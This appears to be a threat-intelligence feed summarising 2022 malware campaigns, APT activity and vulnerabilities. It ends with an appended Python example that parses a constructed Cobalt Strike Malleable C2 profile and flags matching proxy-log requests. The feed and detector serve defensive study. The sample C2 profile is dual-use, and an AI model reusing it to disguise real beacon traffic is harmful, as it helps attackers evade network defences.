- ASEC researchers have analysed a malicious Word file that is being distributed with text impersonating AhnLab. The Word file downloads another Word file containing a malicious VBA macro from an external URL and runs it. The downloaded Word file uses the Windows Media Player() function instead of AutoOpen() to run the VBA macro automatically.
BLISTER & SocGholish loaders delivering LockBit Ransomware
MEDIUM
- Intel Source:
- Trend Micro
- Intel Name:
- BLISTER & SocGholish loaders delivering LockBit Ransomware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro recently discovered that BLISTER and SocGholish, two loaders known for their evasion tactics, were used in a campaign to deliver LockBit ransomware.
Cicada/APT10 new espionage campaign
MEDIUM
- Intel Source:
- Symantec
- Intel Name:
- Cicada/APT10 new espionage campaign
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at Symantec have discovered an espionage campaign by the Chinese APT group APT10/Cicada. Victims identified in this campaign include government, legal, religious and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia and North America.
Evolution of FIN7 group
MEDIUM
- Intel Source:
- Mandiant
- Intel Name:
- Evolution of FIN7 group
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Mandiant published their research on the evolution of FIN7, drawn from both historical and recent intrusions, and described the process of merging eight previously suspected UNC groups into FIN7. The researchers also highlighted notable shifts in FIN7 activity over time, including their use of novel malware, incorporation of new initial access vectors, and shifts in monetization strategies.
Scammers are Exploiting Ukraine Donations
LOW
- Intel Source:
- McAfee
- Intel Name:
- Scammers are Exploiting Ukraine Donations
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- McAfee researchers have identified malicious sites and emails used by attackers to lure users into a cryptocurrency donation scam.
New AsyncRAT campaign features 3LOSH crypter
MEDIUM
- Intel Source:
- Cisco Talos
- Intel Name:
- New AsyncRAT campaign features 3LOSH crypter
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Cisco Talos Intelligence Group discovered that ongoing malware distribution campaigns are using ISO disk images to deliver AsyncRAT and other commodity malware to victims. They found that these campaigns appear to be linked to a new version of the 3LOSH crypter.
CaddyWiper Malware- New Analysis
MEDIUM
- Intel Source:
- Morphisec
- Intel Name:
- CaddyWiper Malware- New Analysis
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Morphisec share a new analysis of the CaddyWiper malware, which has surfaced as the fourth destructive wiper attacking Ukrainian infrastructure. CaddyWiper destroys user data and partition information from attached drives, and has been spotted on several dozen systems in a limited number of organizations.
Colibri Loader campaign delivering the Vidar Stealer
LOW
- Intel Source:
- Malwarebytes
- Intel Name:
- Colibri Loader campaign delivering the Vidar Stealer
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as its final payload and using a clever persistence technique that combines Task Scheduler and PowerShell.
New Rat campaign leverages Tax Season
LOW
- Intel Source:
- Cofense
- Intel Name:
- New Rat campaign leverages Tax Season
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defense Center team has discovered a tactic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages NetSupport Manager, a troubleshooting and screen control program, as a malicious remote access trojan (RAT) that the threat actor employs to remotely enter user systems.
Lazarus Group New Campaign
LOW
- Intel Source:
- SecureList
- Intel Name:
- Lazarus Group New Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- Researchers at SecureList have discovered that a trojanized DeFi application was used by the Lazarus Group to deliver a backdoor. The DeFi application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, but also implants a malicious file when executed.
Mirai campaign updated its arsenal of exploits
MEDIUM
- Intel Source:
- Fortinet
- Intel Name:
- Mirai campaign updated its arsenal of exploits
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet Labs have identified that the Beastmode Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
New UAC-0056 Group activity
MEDIUM
- Intel Source:
- Malwarebytes
- Intel Name:
- New UAC-0056 Group activity
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer Labs shared that UAC-0056 (TA471, SaintBear, UNC2589) has been launching targeted spear-phishing campaigns using spoofed Ukrainian government email addresses to deliver the Elephant malware framework, written in Go.
Stolen Image Evidence Campaign
MEDIUM
- Intel Source:
- DFIR Report
- Intel Name:
- Stolen Image Evidence Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at The DFIR Report have identified a single Conti ransomware deployment from December that appears to be part of a larger campaign. The attack utilized IcedID, a well-known banking trojan, which was delivered via the 'Stolen Images Evidence' email campaign.
Remcos Rat Phishing Campaign
MEDIUM
- Intel Source:
- Morphisec
- Intel Name:
- Remcos Rat Phishing Campaign
- Date of Scan:
- 2022-04-05
- Impact:
- MEDIUM
- Summary:
- Morphisec Labs has detected a new wave of Remcos RAT infections being spread through phishing emails masquerading as payment remittances sent from financial institutions.
VajraEleph (APT-Q-43) group New campaign
LOW
- Intel Source:
- Qianxin
- Intel Name:
- VajraEleph (APT-Q-43) group New campaign
- Date of Scan:
- 2022-04-05
- Impact:
- LOW
- Summary:
- The mobile security team of Qianxin Technology HK Co. Limited Virus Response Center identified that the VajraEleph (APT-Q-43) group has been carrying out targeted military espionage intelligence activities against the Pakistani military.
Hive Ransomware leveraging IPfuscation Technique
MEDIUM
- Intel Source:
- SentinelOne
- Intel Name:
- Hive Ransomware leveraging IPfuscation Technique
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne have discovered a new obfuscation technique used by the Hive ransomware gang, which involves IPv4 addresses and a series of conversions that eventually lead to downloading a Cobalt Strike beacon.
New PlugX variant used by Chinese APT group
MEDIUM
- Intel Source:
- Trellix
- Intel Name:
- New PlugX variant used by Chinese APT group
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at Trellix have discovered a new variant of the PlugX malware named 'Talisman'. The new variant follows the usual execution process by abusing a signed, benign binary that loads a modified DLL to execute shellcode. The shellcode is used to decrypt the PlugX malware, which then serves as a backdoor with plug-in capabilities.
Mars InfoStealer new operation
MEDIUM
- Intel Source:
- Morphisec
- Intel Name:
- Mars InfoStealer new operation
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- The Morphisec Labs team has analysed a campaign in which the actor distributed Mars Stealer via cloned websites offering well-known software. The Morphisec team attributed this actor to a Russian national based on the screenshots and keyboard details in the extracted system.txt.
BlackGuard - new infostealer malware
MEDIUM
- Intel Source:
- Zscaler
- Intel Name:
- BlackGuard - new infostealer malware
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- The Zscaler ThreatLabz team came across BlackGuard, a sophisticated stealer currently being advertised as malware-as-a-service for $200 per month. The researchers share their analysis of the techniques the BlackGuard stealer uses to steal information and evade detection through obfuscation, as well as its anti-debugging techniques.
Acid Rain wiper malware targets Viasat KA-SAT modems
MEDIUM
- Intel Source:
- SentinelOne
- Intel Name:
- Acid Rain wiper malware targets Viasat KA-SAT modems
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have analysed a new wiper, AcidRain, which has been targeting Viasat KA-SAT modems in Europe. This wiper is an ELF MIPS binary designed to wipe modems and routers.
State sponsored groups leveraging RU-UA conflict
MEDIUM
- Intel Source:
- Checkpoint
- Intel Name:
- State sponsored groups leveraging RU-UA conflict
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Check Point provide an overview of several campaigns by different APT groups using the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. They also discuss the victimology of these campaigns and the tactics used, and provide technical analysis of the observed malicious payloads and malware specially crafted for this cyber-espionage.
North Korea related files distributed via malicious VB Scripts
LOW
- Intel Source:
- ASEC
- Intel Name:
- North Korea related files distributed via malicious VB Scripts
- Date of Scan:
- 2022-04-04
- Impact:
- LOW
- Summary:
- ASEC researchers have analysed phishing emails related to North Korea that carry a compressed file as an attachment. The email refers to writing a resume to induce execution of the attached file. A malicious VBS script file exists inside the compressed file.
Deep Panda APT group exploiting Log4shell
MEDIUM
- Intel Source:
- Fortinet
- Intel Name:
- Deep Panda APT group exploiting Log4shell
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs detected an opportunistic campaign by the Chinese nation-state "Deep Panda" APT group exploiting the Log4Shell vulnerability in VMware Horizon servers belonging to the financial, academic, cosmetics and travel industries.
Spoofed Invoice delivering IcedID Trojan
MEDIUM
- Intel Source:
- Fortinet
- Intel Name:
- Spoofed Invoice delivering IcedID Trojan
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs encountered a spear-phishing campaign targeting a fuel company in Kyiv, Ukraine. The email contains an attached zip file, which in turn contains an invoice file claiming to be from another fuel company. The IcedID trojan is dropped via main.dll in the Windows registry.
Spring4Shell Vulnerability
HIGH
- Intel Source:
- Securonix
- Intel Name:
- Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-01
- Impact:
- HIGH
- Summary:
- The Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core, a widely used Java-based platform with cross-platform support. Early details claim that the bug would allow full remote code execution (RCE) on affected systems.
Transparent Tribe targets Indian government and military
MEDIUM
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe targets Indian government and military
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers have identified a new campaign by Transparent Tribe targeting Indian government and military bodies. The threat actor is leveraging CrimsonRAT to infect the victims.
Verblecon - A New Malware Loader
LOW
- Intel Source:
- Symantec
- Intel Name:
- Verblecon - A New Malware Loader
- Date of Scan:
- 2022-03-31
- Impact:
- LOW
- Summary:
- Symantec researchers have identified malware named Trojan.Verblecon, which is being leveraged in attacks whose end goal appears to be installing cryptocurrency miners on infected machines. However, the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware or espionage campaigns.
Chromium Based Browser Vulnerability
MEDIUM
- Intel Source:
- Intel Name:
- Chromium Based Browser Vulnerability
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google is urging users on Windows, macOS and Linux to update Chrome to version 99.0.4844.84 following the discovery of a vulnerability that has an exploit in the wild.
Multiple APT groups targeting Eastern Europe
MEDIUM
- Intel Source:
- Intel Name:
- Multiple APT groups targeting Eastern Europe
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google TAG researchers have tracked 3 APT groups targeting government and military organisations in Ukraine, Kazakhstan and Mongolia, and NATO forces in Eastern Europe. All 3 APT groups are conducting phishing campaigns against these targets.
Emotet New IoC and New Pattern
MEDIUM
- Intel Source:
- Cisco
- Intel Name:
- Emotet New IoC and New Pattern
- Date of Scan:
- 2022-03-30
- Impact:
- MEDIUM
- Summary:
- Cisco conducted research to find new Emotet IOCs and URL patterns related to the new wave of Emotet activity since its re-emergence in November 2021. Cisco researchers summarize the Emotet (Geodo/Heodo) malware threat, its lifecycle and its typical detectable patterns.
Kimsuky distributing VB Script disguised as PDF Files
LOW
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky distributing VB Script disguised as PDF Files
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC researchers have identified APT attacks by the group Kimsuky using VB Script disguised as PDF files. Upon running the script file with the VBS extension, the malware opens the innocuous PDF file embedded inside it to trick the user into thinking they opened a harmless document, and uses a malicious DLL file to leak information.
BitRAT malware disguised as office Installer
LOW
- Intel Source:
- ASEC
- Intel Name:
- BitRAT malware disguised as office Installer
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC researchers have analysed a BitRAT malware sample that is being distributed as an Office installer bundled with other files. The malware is being actively distributed via file-sharing websites such as Korean webhards.
Purple Fox using New variant of FatalRat
MEDIUM
- Intel Source:
- Trend Micro
- Intel Name:
- Purple Fox using New variant of FatalRat
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Trend Micro Research has been tracking a threat actor named 'Purple Fox' and its activities. Researchers identified Purple Fox's new arrival vector and the early access loaders they believe are associated with the intrusion set behind this botnet. The operators are updating their arsenal with new malware, including a variant of the remote access trojan FatalRAT that they seem to be continuously upgrading.
New Conversation Hijacking Campaign Delivering IcedID
MEDIUM
- Intel Source:
- Intezer
- Intel Name:
- New Conversation Hijacking Campaign Delivering IcedID
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer provide a technical analysis of a new campaign that initiates attacks with a phishing email using conversation hijacking to deliver the IcedID malware.
Muhstik Gang targets Redis Servers
MEDIUM
- Intel Source:
- Juniper
- Intel Name:
- Muhstik Gang targets Redis Servers
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Juniper Threat Labs have revealed an attack that targets Redis servers using a recently disclosed vulnerability, CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The payload used is a variant of the Muhstik bot, which can be used to launch DDoS attacks.
Conti Ransomware new update
MEDIUM
- Intel Source:
- Zscaler
- Intel Name:
- Conti Ransomware new update
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler ThreatLabz have been following the Conti ransomware group and, as part of their global ransomware tracking efforts, identified an updated version of Conti ransomware that includes improved file encryption, introduces techniques to better evade security software, and streamlines the ransom payment process.
Operation Dragon Castling
LOW
- Intel Source:
- Avast
- Intel Name:
- Operation Dragon Castling
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Researchers from Avast found an APT campaign dubbed Operation Dragon Castling which has been targeting betting companies in Southeast Asian countries. The campaign has similarities with several old malware samples used by an unspecified Chinese-speaking APT group.
JSSLoader RAT delivered through XLL Files
LOW
- Intel Source:
- Morphisec
- Intel Name:
- JSSLoader RAT delivered through XLL Files
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Morphisec Labs has discovered a new variant of the JSSLoader RAT. JSSLoader is a small but very capable .NET remote access trojan (RAT). Its capabilities include data exfiltration, persistence, auto-updating, additional payload delivery and more. Moreover, attackers are now using .XLL files to deliver an obfuscated version of JSSLoader.
Tax Season and Refugee war scams delivering Emotet
MEDIUM
- Intel Source:
- Fortinet
- Intel Name:
- Tax Season and Refugee war scams delivering Emotet
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- The FortiGuard Labs research team has analysed emails related to tax season and the Ukrainian conflict. The phishing emails are attributed to the infamous 'Emotet' malware, which affects the Windows platform; compromised machines are under the control of the threat actor, leading to theft of personally identifiable information (PII), credential theft, monetary loss, etc.
Chinese APT Scarab targets Ukraine
MEDIUM
- Intel Source:
- SentinelOne
- Intel Name:
- Chinese APT Scarab targets Ukraine
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs have further analysed alert #4244, released by the Ukrainian CERT on 22 March 2022, which describes the malicious activity of the UAC-0026 threat group. The Sentinel team has confirmed the attribution of UAC-0026 to the Chinese APT group Scarab.
Password stealer disguised as private Fortnite server
LOW
- Intel Source:
- Avast
- Intel Name:
- Password stealer disguised as private Fortnite server
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Avast have identified a password stealer malware disguised as a private Fortnite server where users can meet for a private match and use skins for free. The malware is being heavily propagated on the communications platform Discord.
New variants of Arkei Stealer
LOW
- Intel Source:
- ISC.SANS
- Intel Name:
- New variants of Arkei Stealer
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at the SANS InfoSec Diary blog have analysed the Vidar, Oski and Mars stealer variants of the Arkei Stealer malware. The researchers also found that legitimate DLL files used by the Vidar, Oski and Mars variants are hosted on the same C2 server.
Operation DreamJob and AppleJeus
MEDIUM
- Intel Source:
- Intel Name:
- Operation DreamJob and AppleJeus
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Google discovered two North Korean-backed threat actors exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609. These groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus. These campaigns have been targeting U.S.-based organizations.
Arid Viper using Arid Gopher malware
MEDIUM
- Intel Source:
- deepinstinct
- Intel Name:
- Arid Viper using Arid Gopher malware
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Deep Instinct's Threat Research team discovered a never-before-seen Micropsia malware variant dubbed Arid Gopher, attributed to Arid Viper.
Conti Ransomware Affiliate Exposed
MEDIUM
- Intel Source:
- eSentire
- Intel Name:
- Conti Ransomware Affiliate Exposed
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers at eSentire have been tracking the movements of the Conti gang for over two years and are now publishing a new set of indicators currently being used by a Conti affiliate. The researchers' analysis also focuses on the infrastructure used by the gang.
Vidar Malware hidden in Microsoft Help file
MEDIUM
- Intel Source:
- Trustwave
- Intel Name:
- Vidar Malware hidden in Microsoft Help file
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Trustwave SpiderLabs researchers have detected a Vidar malware phishing campaign that abuses Microsoft HTML Help files. Vidar is Windows spyware and an information stealer available for purchase by cybercriminals. Vidar can harvest OS and user data, online service and cryptocurrency account credentials, and credit card information.
Crypto Phishing
LOW
- Intel Source:
- Confiant
- Intel Name:
- Crypto Phishing
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Confiant have looked at several chains that start with an ad and end with cryptocurrency theft, usually via phishing.
Midas Ransomware - A Thanos Ransomware variant
LOW
- Intel Source:
- Zscaler
- Intel Name:
- Midas Ransomware - A Thanos Ransomware variant
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Zscaler have analysed variants of the Thanos ransomware and identified a shift in its tactics in 2021. Thanos ransomware was first identified in Feb 2020 as a RaaS on the dark web. In 2021 the Thanos source code was leaked, after which many variants have been identified by researchers. One of the latest variants is Midas.
Meris and TrickBot joined Hands
MEDIUM
- Intel Source:
- Avast
- Intel Name:
- Meris and TrickBot joined Hands
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- As per Avast researchers, the Meris backdoor and TrickBot have joined hands. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847), enabling the attackers to gain unauthenticated remote administrative access to any affected device.
DoubleZero Destructive Malware targets Ukrainian firms
MEDIUM
- Intel Source:
- CERT-UA
- Intel Name:
- DoubleZero Destructive Malware targets Ukrainian firms
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17, CERT-UA found the presence of destructive malware dubbed DoubleZero targeting Ukrainian firms. The malware erases files and destroys certain registry branches on the infected machine.
Phishing Campaign using QR code targets Ukraine
MEDIUM
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing Campaign using QR code targets Ukraine
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT-UA discovered the distribution of e-mails that mimic messages from UKR.NET and contain a QR code encoding a URL created with one of the URL-shortener services; the activity was attributed with low confidence to APT28.
Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
MEDIUM
- Intel Source:
- CERT-UA
- Intel Name:
- Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17, CERT-UA found an active spear-phishing campaign delivering the SPECTR malware. The campaign was initiated by Vermin, aka UAC-0020, who are associated with the Luhansk People's Republic (LPR).
Mustang Panda deploying new Hodur Malware
MEDIUM
- Intel Source:
- WeLiveSecurity
- Intel Name:
- Mustang Panda deploying new Hodur Malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- A new cyber espionage campaign has been discovered by researchers from ESET in which the China-linked APT group Mustang Panda was deploying the Hodur malware. The victims are from East and Southeast Asia.
Clipper malware disguised as AvD Crypto Stealer
LOW
- Intel Source:
- Cyble
- Intel Name:
- Clipper malware disguised as AvD Crypto Stealer
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered a new malware dubbed 'AvD Crypto Stealer', but it does not function as a crypto stealer. Instead, it is a disguised variant of the well-known clipper malware, with the capability to read and edit any text copied by the victim.
ClipBanker Malware disguised as Malware Creation Tool
LOW
- Intel Source:
- ASEC
- Intel Name:
- ClipBanker Malware disguised as Malware Creation Tool
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- The ASEC team has identified ClipBanker malware disguised as a malware creation tool. ClipBanker monitors the clipboard of the infected system and, if the user copies a string that is a coin wallet address, changes it to the address designated by the attacker.
UAC-0026 targets Ukraine by HeaderTIP malware
MEDIUM
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0026 targets Ukraine by HeaderTIP malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT-UA identified yet another nefarious malware, dubbed HeaderTip, which is leveraged to drop additional DLL files on the infected instance and which has been targeting the infrastructure of Ukrainian state bodies and organizations across the country.
Document-borne APT attack targeting Carbon emissions companies
LOW
- Intel Source:
- ASEC
- Intel Name:
- Document-borne APT attack targeting Carbon emissions companies
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- The ASEC team has analysed a malicious Word document titled '**** Carbon Credit Institution.doc' which the user downloaded through a web browser. The team identified the malicious document from the logs collected by their Smart Defense tool. The malicious document comes with macro code, and it is likely that its internal macro code runs wscript.ex.
Serpent Backdoor Targets French government firms
MEDIUM
- Intel Source:
- Proofpoint
- Intel Name:
- Serpent Backdoor Targets French government firms
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers identified a targeted attack leveraging the open-source package installer Chocolatey to deliver a backdoor. The backdoor was dubbed Serpent and the targets have been French firms in construction and real estate.
Malware disguised as a Windows Help File
LOW
- Intel Source:
- ASEC
- Intel Name:
- Malware disguised as a Windows Help File
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- The ASEC team has discovered malware disguised as a Windows Help File (*.chm) targeting Korean users. A CHM file is a compiled HTML Help file, which is executed via the Microsoft HTML Help executable. After the CHM file is executed, it downloads additional malicious files.
Serpent Backdoor_Seeder_Queries_21/03/22
MEDIUM
- Intel Source:
- STR
- Intel Name:
- Serpent Backdoor_Seeder_Queries_21/03/22
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
APT35 Automates Initial Access Using ProxyShell
MEDIUM
- Intel Source:
- DFIR Report
- Intel Name:
- APT35 Automates Initial Access Using ProxyShell
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- Researchers at The DFIR Report observed an intrusion attributed to APT35 exploiting ProxyShell vulnerabilities, followed by further post-exploitation activity that included web shells, credential dumping and specialized payloads.
SurTr Ransomware recent activity
LOW
+
—
- Intel Source:
- Arete
- Intel Name:
- SurTr Ransomware recent activity
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Researchers from Arete investigated a security incident involving Surtr ransomware, which made a registry key change on the infected host as a tribute to the REvil group.
BitRAT distributed via webhards
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT distributed via webhards
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- The ASEC team analysed malware being distributed via webhards and identified it as BitRAT. The attacker disguised the malware as a Windows 10 licence verification tool, naming the installer 'New Quick Install Windows License Verification' One-click to lure users.
DarkHotel APT New Campaign
LOW
+
—
- Intel Source:
- Trellix
- Intel Name:
- DarkHotel APT New Campaign
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Trellix researchers discovered a first-stage malicious campaign that has targeted luxury hotels in Macao, China over the past five months; the activity has been attributed to the South Korean APT group DarkHotel.
UAC-0035/InvisiMole targeting Ukrainain government
LOW
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0035/InvisiMole targeting Ukrainain government
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- CERT-UA identified cyberattacks launched by the UAC-0035/InvisiMole threat group against Ukrainian government organisations using phishing campaigns. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon group.
CONTI & EMOTET Infrastructure
LOW
+
—
- Intel Source:
- Dragos
- Intel Name:
- CONTI & EMOTET Infrastructure
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers at Dragos observed consistent network communication between Emotet infrastructure and automotive manufacturers across North America and Japan. Emotet is a botnet and loader rather than ransomware itself; it is suspected of being operated on behalf of the Conti ransomware group.
Cobalt Strike-an effective emulator
LOW
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Cobalt Strike-an effective emulator
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Cobalt Strike is a commercial adversary-emulation tool whose Beacon implant emulates command-and-control communications; it is widely abused in real-world attacks. Operators control Beacon's HTTP indicators (URIs, headers, User-Agent, how metadata is encoded) through a profile, either the default profile or a customisable Malleable C2 profile, which can be tuned to blend in with legitimate traffic and evade traditional network defences.
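As an added example (not from the Palo Alto post and not Cobalt Strike's own code), the following Python shows the defensive use of a Malleable C2 profile: it extracts the on-the-wire indicators the profile defines (the User-Agent, the http-get and http-post URIs, and the client/server headers) and matches them against proxy log records. The profile fragment, the log records, and every name in the code are assumptions made for this illustration; the fragment follows the Malleable C2 syntax but its values are invented. The parser handles only the directives shown (set, header, nested blocks); real profiles contain more.

```python
import re
from dataclasses import dataclass, field

# Constructed profile fragment (assumption): Malleable C2 syntax with made-up values.
SAMPLE_PROFILE = r'''
# global options
set sleeptime "45000";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleAgent/1.0";
http-get {
    set uri "/api/v2/status /cdn/assets/app.js";
    client {
        header "Host" "cdn.example-assets.invalid";
        metadata { base64url; prepend "SESSIONID="; header "Cookie"; }
    }
    server {
        header "Content-Type" "application/javascript";
        output { base64; print; }
    }
}
http-post {
    set uri "/api/v2/submit";
    client {
        header "Content-Type" "application/octet-stream";
        id { parameter "token"; }
    }
    server { output { print; } }
}
'''

_SET_RE = re.compile(r'^\s*set\s+(\w+)\s+"((?:[^"\\]|\\.)*)"\s*;')
_HEADER_RE = re.compile(r'^\s*header\s+"([^"]+)"\s+"((?:[^"\\]|\\.)*)"\s*;')
_BLOCK_RE = re.compile(r'^\s*([\w-]+)\s*\{')

@dataclass
class BeaconIndicators:
    useragent: str = ""
    get_uris: list = field(default_factory=list)
    post_uris: list = field(default_factory=list)
    headers: list = field(default_factory=list)  # (transaction, side, name, value)

def parse_profile(text: str) -> BeaconIndicators:
    """Line-oriented walk of the profile. A stack of open block names tells us whether a
    directive sits in http-get or http-post and on the client or server side."""
    ind, stack = BeaconIndicators(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # strip comments ('#' never appears inside values here)
        if not line.strip():
            continue
        opens, closes = line.count("{"), line.count("}")
        m = _BLOCK_RE.match(line)
        if m:                                   # a named block opens on this line
            stack.append(m.group(1))
            opens -= 1
        stack.extend(["_"] * opens)             # inline braces such as "output { base64; print; }"
        transaction = next((b for b in stack if b in ("http-get", "http-post")), None)
        side = next((b for b in stack if b in ("client", "server")), None)
        m = _SET_RE.match(line)
        if m:
            key, value = m.groups()
            if key == "useragent" and not stack:
                ind.useragent = value
            elif key == "uri" and transaction == "http-get":
                ind.get_uris.extend(value.split())   # one uri directive may list several URIs
            elif key == "uri" and transaction == "http-post":
                ind.post_uris.extend(value.split())
        m = _HEADER_RE.match(line)
        if m and transaction and side:
            ind.headers.append((transaction, side, m.group(1), m.group(2)))
        for _ in range(closes):
            if stack:
                stack.pop()
    return ind

def match_proxy_log(ind: BeaconIndicators, records):
    """Return (src, reasons) for records that hit at least two independent indicators;
    a lone URI or User-Agent match is weak evidence on its own."""
    hosts = {v for t, s, h, v in ind.headers if s == "client" and h.lower() == "host"}
    hits = []
    for rec in records:
        reasons = []
        if rec["ua"] == ind.useragent:
            reasons.append("useragent")
        path = rec["uri"].split("?", 1)[0]
        if rec["method"] == "GET" and path in ind.get_uris:
            reasons.append("get-uri")
        if rec["method"] == "POST" and path in ind.post_uris:
            reasons.append("post-uri")
        if rec["host"] in hosts:
            reasons.append("host-header")
        if len(reasons) >= 2:
            hits.append((rec["src"], reasons))
    return hits

# Constructed proxy records (assumption): not real traffic.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleAgent/1.0"
SAMPLE_PROXY_LOG = [
    {"src": "10.0.0.5", "method": "GET", "host": "cdn.example-assets.invalid", "uri": "/api/v2/status", "ua": UA},
    {"src": "10.0.0.5", "method": "POST", "host": "cdn.example-assets.invalid", "uri": "/api/v2/submit?token=AAEC", "ua": UA},
    {"src": "10.0.0.9", "method": "GET", "host": "www.example.invalid", "uri": "/index.html", "ua": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"src": "10.0.0.12", "method": "GET", "host": "www.example.invalid", "uri": "/api/v2/status", "ua": "curl/7.81.0"},
]

if __name__ == "__main__":
    indicators = parse_profile(SAMPLE_PROFILE)
    for src, reasons in match_proxy_log(indicators, SAMPLE_PROXY_LOG):
        print(f"{src}: beacon-like request ({', '.join(reasons)})")
```

The two-indicator rule is deliberate: profiles are often cloned from legitimate sites, so a URI or User-Agent on its own will collide with real traffic; requiring the host header or the paired POST URI as well keeps the false-positive rate tolerable.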
